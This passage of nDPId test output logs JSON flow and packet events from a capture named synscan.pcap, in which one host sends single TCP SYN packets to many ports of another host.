+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAswmIAADUGURCsEAAIQA2GNIzSApvdUoMYAAAAAGACCAAt9AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2UYAACYGSSysEAAIQA2GNIzSI3jdUoMYAAAAAGACDAAJFwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsOl0AACcG5xWsEAAIQA2GNIzSE+7dUoMYAAAAAGACEAAUoQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSLAAADAGz8KsEAAIQA2GNIzSFvXdUoMYAAAAAGACBAAdmgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSH8AADcGyPOsEAAIQA2GNIzSBA3dUoMYAAAAAGACEAAkggAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsWcgAADcGt6qsEAAIQA2GNIzSFxPdUoMYAAAAAGACEAARfAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAs2jgAACwGQjqsEAAIQA2GNIzSANPdUoMYAAAAAGACBAAzvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsdCsAADsGmUesEAAIQA2GNIzSB\/PdUoMYAAAAAGACEAAgnAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8MAADgGoK+sEAAIQA2GNIzSAJDdUoMYAAAAAGACBAAz\/wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXXkAADcGs\/msEAAIQA2GNIzSBFjdUoMYAAAAAGACEAAkNwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZeIAADsGp5CsEAAIQA2GNIzSCHrdUoMYAAAAAGACEAAgFQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsVbcAADIGwLusEAAIQA2GNIzSF9XdUoMYAAAAAGACDAAUugAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsFoAAADQG\/fKsEAAIQA2GNIzSAyDdUoMYAAAAAGACBAAxbwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsLm4AADIG6ASsEAAIQA2GNIzSIyLdUoMYAAAAAGACDAAJbQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZG4AADUGrwSsEAAIQA2GNIzSCV\/dUoMYAAAAAGACCAAnMAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsqyIAACsGclCsEAAIQA2GNIzSDfzdUoMYAAAAAGACEAAakwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXvEAADYGs4GsEAAIQA2GNIzSAFndUoMYAAAAAGACDAAsNgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsT3AAACcG0gKsEAAIQA2GNIzSIqndUoMYAAAAAGACEAAF5gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsjsMAADcGgq+sEAAIQA2GNIzSG8LdUoMYAAAAAGACEAAMzQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kwAACcGJyasEAAIQA2GNIzSH5fdUoMYAAAAAGACEAAI+AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs9w4AADIGH2SsEAAIQA2GNIzSJXrdUoMYAAAAAGACDAAHFQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsYMkAADoGramsEAAIQA2GNIzSBEvdUoMYAAAAAGACDAAoRAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAseVsAACcGqBesEAAIQA2GNIzShw3dUoMYAAAAAGACEAChgQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsAugAACkGHIusEAAIQA2GNIzSE6bdUoMYAAAAAGACCAAc6QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 